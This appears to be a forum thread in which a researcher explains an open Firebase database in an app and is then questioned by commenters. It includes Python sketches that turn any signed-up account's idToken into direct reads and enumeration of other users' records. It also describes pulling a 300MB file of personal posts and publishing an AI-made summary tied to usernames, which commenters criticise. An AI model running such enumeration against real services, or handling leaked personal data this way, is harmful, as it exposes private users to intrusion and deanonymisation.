
Hi all, I'm the security researcher mentioned in the article -- just to be clear:

1. The leak Friday was from Firebase's file storage service

2. This one is about their Firebase database service also being open (up until Saturday morning)

The tl;dr is:

1. App signed up using Firebase Auth

2. App traded Firebase Auth token to API for API token

3. API talked to Firebase DB

The issue is that you could skip the app's API entirely: take the Firebase Auth token, talk to Firebase directly, and because read/write/update/delete permissions were open to all authenticated users, that opened up an IDOR exploit.
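
For anyone wanting to picture it, here's a minimal sketch of that direct path, assuming the Realtime Database REST API; the project URL, paths, rules, and user IDs below are placeholders, not the app's real values:

    # Sketch of the IDOR: any signed-in user's idToken works against the
    # database directly, bypassing the app's API. All names/URLs are hypothetical.
    import requests

    ID_TOKEN = "eyJ..."  # Firebase Auth idToken from my own throwaway account
    DB_URL = "https://example-project-default-rtdb.firebaseio.com"  # placeholder

    # With rules effectively like
    #   {"rules": {".read": "auth != null", ".write": "auth != null"}}
    # any authenticated user can read (or overwrite/delete) records belonging
    # to any other user just by varying the path -- that's the IDOR.
    other_user_id = "someOtherUsersUid"  # hypothetical
    resp = requests.get(f"{DB_URL}/users/{other_user_id}.json", params={"auth": ID_TOKEN})
    print(resp.status_code, resp.json())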

I pulled the data Friday night to have evidence proving the information wasn't old like the previous leak, and immediately reached out to 404 Media.

Here is a gist of Gemini 2.5 Pro summarizing 10k random posts: https://gist.github.com/jc4p/7c8ce9a7392f2cbc227f9c6a4096111...

And to be 100% clear, the data in this second "leak" is a 300MB JSON file that (hopefully) only exists on my computer, but I did see evidence that other people were communicating with the Firebase database directly.

If anyone is interested in the how: I signed up against Firebase Auth using a dummy email and password, retrieved an idToken, and sent it into the script generated by this Claude convo: https://claude.ai/share/2c53838d-4d11-466b-8617-eae1a1e84f56
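
Roughly, that flow looks like the sketch below; the Web API key and project URL are placeholders, and I'm assuming the Realtime Database REST API (if it were Firestore, the same idea works against firestore.googleapis.com with the idToken as a Bearer token):

    # Hypothetical sketch of the signup -> idToken -> direct DB enumeration flow.
    import requests

    WEB_API_KEY = "AIza..."  # placeholder: the app's public Firebase Web API key
    DB_URL = "https://example-project-default-rtdb.firebaseio.com"  # placeholder

    # 1. Sign up a throwaway account via the Firebase Auth REST API, get an idToken.
    signup = requests.post(
        f"https://identitytoolkit.googleapis.com/v1/accounts:signUp?key={WEB_API_KEY}",
        json={"email": "dummy@example.com", "password": "a-throwaway-password",
              "returnSecureToken": True},
    )
    id_token = signup.json()["idToken"]

    # 2. Shallow-read the database root to enumerate top-level nodes, then count
    #    the keys under each one (similar to the output gist linked below).
    root = requests.get(f"{DB_URL}/.json", params={"auth": id_token, "shallow": "true"}).json()
    for node in root or {}:
        keys = requests.get(f"{DB_URL}/{node}.json", params={"auth": id_token, "shallow": "true"}).json()
        print(node, len(keys) if isinstance(keys, dict) else 1)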

And here's the output of that script (any db that has <100 rows is something another "hacker" wrote to and deleted from): https://gist.github.com/jc4p/bc35138a120715b92a1925f54a9d8bb...



Doesn't that Gemini summary gist tie usernames to pretty specific, highly personal, non-public stories? That seems like a significant violation of ethical hacking principles.


They're anonymous usernames the app had them make, and users were told not to reuse anything shared elsewhere. I googled them and couldn't uniquely identify anyone from any of them.

They seem generic enough that I think it's okay, but you're right, there was no need to include them and I should've caught that in the AI output, thank you!!


I think including specific stories is already an ethical hacking violation.

Including the pseudonyms associated with those stories creates unnecessary risk for those individuals, and arguably an incentive to deanonymize them.

I also just don't get the mindset of dumping something like this into an AI tool for a summary. You say "a 300MB JSON file that (hopefully) only exists on my computer" but then you exposed part of that data to an AI tool to generate a summary.

Having the file on your computer is questionable enough, but not treating it as something private to be professionally protected is, IMHO, another ethical violation.


I don't see the need for the AI output to begin with. Normally pen-testers just demonstrate breaches; this is more like exposing what users do on the app.


Are you concerned about potential CFAA issues?


Yes! haha! But hopefully I have a good enough support group and connections that I'll be ok if that happens. I just really wanted to prove that they were not being honest when they said it was data from prior to 2024.


Computer Fraud and Abuse Act - "CFAA"



